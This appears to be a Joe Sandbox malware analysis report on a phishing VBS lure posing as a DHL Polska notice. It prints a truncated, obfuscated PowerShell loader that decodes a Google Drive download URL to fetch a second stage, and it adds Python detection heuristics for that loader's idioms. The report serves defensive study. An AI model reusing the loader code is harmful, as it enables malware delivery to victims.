IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padle
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
Source: C:\Windows\System32\wscript.exe
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91 cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91';if (${host}.currentculture) {$clairaudience++;}function trosfllen($gendigtende){$statshemmelighedernes=$gendigtende.length-$clairaudience;$prehensible='substri';$prehensible+='ng';for( $bilkberne195=2;$bilkberne195 -lt $statshemmelighedernes;$bilkberne195+=3){$cygnid+=$gendigtende.$prehensible.invoke( $bilkberne195, $clairaudience);}$cygnid;}function extensionalism($medullitis){ & ($impotens) ($medullitis);}$czardas=trosfllen ' omvrom,zbaiaalr.la,a.e/st5no.ko0ge br(bawini mnp,d,domew esre pnc tf, sp1ta0 ,. e0s.;pn ,w ,iskns 6en4 l;go trxsk6fo4 ;f, frguvh :ma1l 2,a1.n.pa0re)b, ge,e.ecankwioh / g2n.0an1st0.y0t,1.b0.s1m. cfvei rr ieenflyoprxso/co1ty2s,1 a. t0 d ';$preassuring=trosfllen ' auh skoeoprfa-nea,ugk,e ncot.k ';$lovreglens=trosfllen 'd hhjtoct .pacsos:tr/sa/hod srtei,fvskes .gigl,o.iohygaxltueb,. dcreo cmer/fiup.c i?beeanxa.pskoa,rvet i=bidp ocaw.in ols.o qaovdtr&loimad m=ko1 ey s-unsborarwmey t9p.w spatbox eode0seaa.cus2 fnjiv agan8 ja ,2,ea .u .meonbitri3bevsgqunyj cp ';$unhomologic=trosfllen ' >te ';$impotens=trosfllen 'peiunestxum ';$aarigt='traadrullerne';$databasemodellerne = trosfllen 'b etrck.h,nomy k%u.a ypt pkvdchahatbraul% s\ od,vesim,eo,rcl.r.iaretknieasolistndigno. 
is ppb.ico w,&bj&ki e.euncx h .ofo at h ';extensionalism (trosfllen ' s$,ngh,lviokubsoa lm : bgrit.gratcrhg.agetu.c ah.r=.h(zacflm kdj, pa/ eceu e.$andbratet ,asnb aa fskle amr oeld.eeorll,l,kea rmonfoehe)lu ');extensionalism (trosfllen 'ki$r gosl aoprbs atul.r:k.mt.a,tlsyluneauo tlskafars,= ,$mels on v er ,e rg .l eet nc,sjr.mis ,pscl pifot v( s$meuern ch .oadmurotel.koh,g,biflcdi)co ');extensionalism (trosfllen ' p[b.nhaet,t .. .s .eferb,vfoi.tcnoet,povoliichnsltbimrea kn daokg.iesarc,] .:.i:disklespcseu irsliintuny.ip cr.eo ,t so fcf,o lte .l=bu se[ nbeefutal.besatesocfrumar oielt ay.op kr.nosutveosackiocol ut fy.ip.eega]ls: o:s.tpaldosmo1ps2 , ');$lovreglens=$malleolar[0];$fjedrene= (trosfllen ' o$.lgkul.eoetbd.asila.:esafond,i psdee.lindkmyo intrif.cgu= ,n pe.aw h-afojebtoj kefocp.t , desspy essntheebimul.,dn res.tre.luwspeprbspc ,le,ifoen nv t');$fjedrene+=$bigthatch[1];extensionalism ($fjedrene);extensionalism (trosfllen 'do$uha,rnfiidesbeeprifrkvrostnsai .cir.lehdue ,agidate,orimsbu[eu$stp srdeetuasysbosdiuprr di tnr gso]cr=s $sucstzrha,mrjod fa.esva ');$padle
(the report truncates the command line at this point)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'cygnid hemiteratic orthodiagraphy217 malleolar lovreglens aflbsledninger sagsaktens traadrullerne nonscalar nondeclaratory yawnups abet226 stammefejderne33 avitaminosis aabenlyses fusionsmusikken earthworms kursusmodulet bolledejene rollefag eyras windowshopping usr disboscation91 ...' (the rest of the command line is identical to the one above, truncated at the same point: the 64-bit PowerShell relaunches the same script in the 32-bit SysWOW64 PowerShell)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (listed a second time in the report, with the same command line)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Queries volume information (VolumeInformation) for:
• C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (7 identical rows)
• C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
• C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
• C:\

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Queries volume information (VolumeInformation) for:
• C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (9 identical rows)
• C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
• C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
• C:\
• C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
• C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll
• C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll

Source: C:\Windows\System32\wscript.exe
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
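The process-creation rows earlier in this section give three traits a detection can key on without ever decoding the payload: a Windows Script Host process (wscript.exe) spawning powershell.exe, the 64-bit powershell.exe relaunching itself as the SysWOW64 (32-bit) powershell.exe with the same command line, and a multi-kilobyte command line built from the same handful of idioms (a cls;write junk-word preamble, 'substri' + 'ng', .invoke(, & ($var) (...), a ${host}.currentculture check and a .length-$var loop bound). The Python below is an added example and not part of the report: the events are constructed from the rows on this page with a shortened excerpt of the captured command line, and the explorer.exe event is an invented benign control.

```python
"""Heuristics for the loader chain recorded in the process-creation rows.

Added example, not from the report. Observable traits on this page:
  * wscript.exe spawns the 64-bit powershell.exe,
  * that powershell.exe relaunches itself as the SysWOW64 powershell.exe
    with the same command line,
  * the command line is several kilobytes long and repeats the same
    obfuscation idioms in every copy.
The events below are constructed from those rows; CMD_EXCERPT is a
shortened excerpt of the captured command line.
"""
import re

# Idioms visible in the captured command line, matched case-insensitively.
OBFUSCATION_IDIOMS = {
    "write_junk_preamble":       r"cls;write\s+'",
    "split_substring_keyword":   r"'substri'.{0,40}'ng'",
    "reflective_invoke":         r"\.invoke\(",
    "call_operator_on_variable": r"&\s*\(\$\w+\)\s*\(",
    "host_culture_check":        r"\$\{host\}\.currentculture",
    "length_minus_var_bound":    r"\.length-\$\w+",
}


def obfuscation_hits(cmdline: str) -> list:
    """Names of the idioms present in a command line, in table order."""
    return [name for name, rx in OBFUSCATION_IDIOMS.items() if re.search(rx, cmdline, re.I)]


def _is(image: str, *names: str) -> bool:
    """True if the image path's file name is one of `names` (case-insensitive)."""
    return image.lower().rsplit("\\", 1)[-1] in names


def score_event(parent_image: str, image: str, cmdline: str, long_threshold: int = 1000) -> list:
    """Return the reasons one process-creation event looks like this chain."""
    reasons = []
    if _is(parent_image, "wscript.exe", "cscript.exe") and _is(image, "powershell.exe"):
        reasons.append("wsh_spawns_powershell")
    if (_is(parent_image, "powershell.exe") and _is(image, "powershell.exe")
            and "\\syswow64\\" in image.lower() and "\\syswow64\\" not in parent_image.lower()):
        reasons.append("x64_powershell_relaunches_as_wow64")
    if len(cmdline) >= long_threshold:
        reasons.append("very_long_cmdline")
    hits = obfuscation_hits(cmdline)
    if len(hits) >= 3:
        reasons.append("obfuscation_idioms:" + ",".join(hits))
    return reasons


# Constructed events modelled on the rows above.
WSCRIPT = r"C:\Windows\System32\wscript.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD_EXCERPT = (
    "cls;write 'cygnid hemiteratic orthodiagraphy217 malleolar lovreglens';"
    "if (${host}.currentculture) {$clairaudience++;}"
    "function trosfllen($gendigtende){$statshemmelighedernes=$gendigtende.length-$clairaudience;"
    "$prehensible='substri';$prehensible+='ng';"
    "for( $bilkberne195=2;$bilkberne195 -lt $statshemmelighedernes;$bilkberne195+=3)"
    "{$cygnid+=$gendigtende.$prehensible.invoke( $bilkberne195, $clairaudience);}$cygnid;}"
    "function extensionalism($medullitis){ & ($impotens) ($medullitis);}"
)
EVENTS = [
    (WSCRIPT, PS64, CMD_EXCERPT),
    (PS64, PS32, CMD_EXCERPT),
    (r"C:\Windows\explorer.exe", PS64, "powershell.exe -NoProfile -Command Get-Process"),  # invented benign control
]

if __name__ == "__main__":
    for parent, child, cmd in EVENTS:
        print(child.rsplit("\\", 1)[-1], "<-", parent.rsplit("\\", 1)[-1], score_event(parent, child, cmd))
```

The idiom list is deliberately tied to syntax the loader cannot drop without rewriting its decoder (the call operator on a variable, the split method name, the length-minus-width bound), so it survives re-randomised variable names; the parent/child checks carry the chain even when the command line is not logged in full.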
MITRE ATT&CK matrix (the report's 14-column grid, rebuilt here as one line per tactic; a number in front of a technique is the signature-count badge the report shows for it, and techniques without a number had no matching signature):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 121 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; 21 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers
Persistence: 121 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 13 System Information Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label
DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs | 3% | ReversingLabs | Win32.Dropper.Generic
DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs | 5% | Virustotal |
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
drive.usercontent.google.com | 1% | Virustotal |
drive.google.com | 0% | Virustotal |

Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://apis.google.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://drive.google.com/u | 0% | Avira URL Cloud | safe
http://drive.usercontent.google.com | 0% | Avira URL Cloud | safe
https://drive.google.com/uc?ex | 0% | Avira URL Cloud | safe
https://go.microsoft.co | 0% | Avira URL Cloud | safe
https://drive.goog | 0% | Avira URL Cloud | safe
https://drive.goog | 1% | Virustotal |
https://drive.usercontent.googh8 | 0% | Avira URL Cloud | safe
http://drive.google.com | 0% | Avira URL Cloud | safe
https://go.microsoft.co | 1% | Virustotal |
https://drive.google.com/uc?ex | 2% | Virustotal |
https://drive.google.com/u | 0% | Virustotal |
https://drive.google. | 0% | Avira URL Cloud | safe
https://drive.go | 0% | Avira URL Cloud | safe
http://drive.usercontent.google.com | 1% | Virustotal |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://drive.goo | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
https://drive.g | 0% | Avira URL Cloud | safe
https://drive.google.com/uc | 0% | Avira URL Cloud | safe
https://drive.google. | 0% | Virustotal |
https://drive.goo | 0% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
https://drive.google.com/ | 0% | Avira URL Cloud | safe
http://drive.google.com | 0% | Virustotal |
https://www.google.com | 0% | Virustotal |
https://drive.google.com/uc?e | 0% | Avira URL Cloud | safe
https://drive.google.com | 0% | Avira URL Cloud | safe
https://drive.googl | 0% | Avira URL Cloud | safe
https://drive.google.com/uc | 1% | Virustotal |
https://drive.usercontent.google.com | 0% | Avira URL Cloud | safe
https://drive.googPB | 0% | Avira URL Cloud | safe
https://drive.google.com/uc?e | 2% | Virustotal |
https://drive.google.c | 0% | Avira URL Cloud | safe
https://drive.google.com/uc? | 0% | Avira URL Cloud | safe
https://drive.usercontent.google.com | 1% | Virustotal |
https://drive.google | 0% | Avira URL Cloud | safe
https://drive.google.co | 0% | Avira URL Cloud | safe
http://crl.micros | 0% | Avira URL Cloud | safe
https://drive.google.com/ | 1% | Virustotal |
https://drive.google.com/uc? | 0% | Virustotal |
https://drive.google.com | 1% | Virustotal |
https://drive.google | 0% | Virustotal |
https://drive.google.co | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.185.174 | true | false | - | unknown
drive.usercontent.google.com | 142.250.186.161 | true | false | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
http://drive.usercontent.google.com | powershell.exe, 00000005.00000002.2970229076.000001D0588FC000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.goog | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.microsoft.co | powershell.exe, 00000005.00000002.3017587099.000001D06EF80000.00000004.00000020.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/uc?ex | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.google.com/u | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://drive.google.com | powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.usercontent.googh8 | powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google. | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.go | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2969690427.0000000004F26000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.goo | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com | powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.g | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/uc | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/ | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.googl | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.com/uc?e | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.3010170859.000001D066B48000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2973558788.0000000005E31000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D05856A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D056D05000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.usercontent.google.com | powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D056FA8000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.googPB | powershell.exe, 00000005.00000002.2970229076.000001D0588BE000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://drive.google.c | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://apis.google.com | powershell.exe, 00000005.00000002.2970229076.000001D056FA4000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D0588E9000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D0588E5000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000005.00000002.2970229076.000001D0588C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com/uc? | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.2970229076.000001D056AE1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.2969690427.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
https://drive.google.co | powershell.exe, 00000005.00000002.2970229076.000001D057D65000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
http://crl.micros | powershell.exe, 00000005.00000002.3019849567.000001D06F29C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
142.250.186.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1466655
Start date and time: 2024-07-03 08:49:24 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs
renamed because original name is a hash value
Original Sample Name: DHL Polska_Powiadomienie oprzesyce 28036893335.vbs
Detection: MAL
Classification: mal96.troj.expl.evad.winVBS@9/7@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 45
• Number of non-executed functions: 13
Cookbook Comments:
• Found application associated with file extension: .vbs
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 93.184.221.240
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6160 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8096 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:50:17 | API Interceptor | 1x Sleep call for process: wscript.exe modified
02:52:14 | API Interceptor | 55x Sleep call for process: powershell.exe modified
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
Zapytanie ofertowe (GASTRON 07022024).vbs | malicious | AgentTesla, GuLoader | 142.250.185.174, 142.250.186.161
B24E33 ENQUIRY.vbe | malicious | AgentTesla, PureLog Stealer | 142.250.185.174, 142.250.186.161
Purchase Order N#U00b0 20240702.vbs | malicious | AgentTesla, GuLoader | 142.250.185.174, 142.250.186.161
AWB 3609 961.pdf.scr.exe | malicious | AgentTesla | 142.250.185.174, 142.250.186.161
MT_0615_60931PDF.exe | malicious | AgentTesla, PureLog Stealer | 142.250.185.174, 142.250.186.161
Doc230906103882.exe | malicious | AgentTesla, PureLog Stealer | 142.250.185.174, 142.250.186.161
birectangular.vbs | malicious | FormBook, GuLoader | 142.250.185.174, 142.250.186.161
AWB#276097479258.pdf.html | malicious | Unknown | 142.250.185.174, 142.250.186.161
payment.exe | malicious | Snake Keylogger | 142.250.185.174, 142.250.186.161
Doc_CI_PL_HBL_COO_Insu_.exe | malicious | AgentTesla | 142.250.185.174, 142.250.186.161
            Process:C:\Windows\System32\wscript.exe
            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
            Category:dropped
            Size (bytes):71954
            Entropy (8bit):7.996617769952133
            Encrypted:true
            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
            Malicious:false
            Reputation:moderate, very likely benign file
